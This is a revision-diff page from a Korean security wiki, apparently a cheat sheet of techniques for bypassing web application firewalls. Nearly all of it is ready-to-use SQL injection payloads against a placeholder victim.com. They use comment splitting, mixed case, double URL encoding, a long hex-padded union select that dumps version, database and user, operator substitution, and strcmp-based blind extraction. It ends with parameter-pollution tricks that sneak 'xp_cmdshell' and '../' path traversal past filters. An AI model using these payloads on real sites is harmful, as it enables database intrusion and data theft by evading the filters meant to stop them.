차이

문서의 선택한 두 판 사이의 차이를 보여줍니다.

차이 보기로 링크

다음 판
이전 판
마지막 판양쪽 다음 판
tips:waf_우회기법_cheating_sheet [2013/08/20 07:07] – 새로 만듦 121.140.124.172tips:waf_우회기법_cheating_sheet [2023/05/22 07:34] wiki1122
줄 1: 줄 1:
 +* 사업 등 관련 문의: T) 02-322-4688, F) 02-322-4646, E) [[info@wikisecurity.net]] 
 +
 ====== WAF 우회기법 Cheating sheet ====== ====== WAF 우회기법 Cheating sheet ======
  
줄 6: 줄 8:
  
 ==== 1) 주석처리 방법 ==== ==== 1) 주석처리 방법 ====
- 
  
   http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3.....   http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3.....
줄 15: 줄 16:
  
 * 방화벽 필터설정이 다음과 같을 때 /union\select/g * 방화벽 필터설정이 다음과 같을 때 /union\select/g
-<code> + 
-http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3... +  http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3... 
-</code>+
  
 ==== 3) 단어 대체 방법 ==== ==== 3) 단어 대체 방법 ====
줄 33: 줄 34:
 http://victim.com/news.php?id=1%252f%252a*/union%252f%252a/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users-- http://victim.com/news.php?id=1%252f%252a*/union%252f%252a/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
 http://victim.com/news.php?id=1/**/union/*/select/**/1,2,3/**/from/**/users-- http://victim.com/news.php?id=1/**/union/*/select/**/1,2,3/**/from/**/users--
 +</code>
 +
 +==== 5) 버퍼오버플로우 방법 ====
 +
 +<code>
 +http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141414141414141.)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
 </code> </code>
  
줄 73: 줄 80:
 ==== 3) 필터링 키워드 우회 방법 ==== ==== 3) 필터링 키워드 우회 방법 ====
  
-대부분의 웹방화벽에서는 and, or 과 같은 문자를 필터링 합니다.+대부분의 웹방화벽에서는 and, or 과 같은 문자를 필터링합니다.
  
-다음과 같은 SQL 공격 시도시 and, or 을 ||, && 로 대체하여 우회가 가능합니다.+다음과 같은 SQL 공격 시도시 and, or 을 ||, && 로 대체하여 우회 가능합니다.
  
 <code> <code>
줄 108: 줄 115:
 strcmp(left('password',1), 0x70) = 0 strcmp(left('password',1), 0x70) = 0
 strcmp(left('password',1), 0x71) = -1 strcmp(left('password',1), 0x71) = -1
 +</code>
 +
 +==== 5) HTTP 파라미터 변조(오염) ====
 +
 +{{:tips:query_string_and_web_server_response.png?600&nolink|}}\\ (*)출처 : http://netsec.rs
 +
 +Magic character "%" affect to ASP/ASP.NET
 +
 +<code>
 +Forbidden: http://localhost/?xp_cmdshell
 +Bypassed : http://localhost/?xp[cmdshell
 +</code>
 +
 +<code>
 +Forbidden: http://localhost/test.asp?file=../bla.txt
 +Bypassed : http://localhost/test.asp?file=.%./bla.txt
 </code> </code>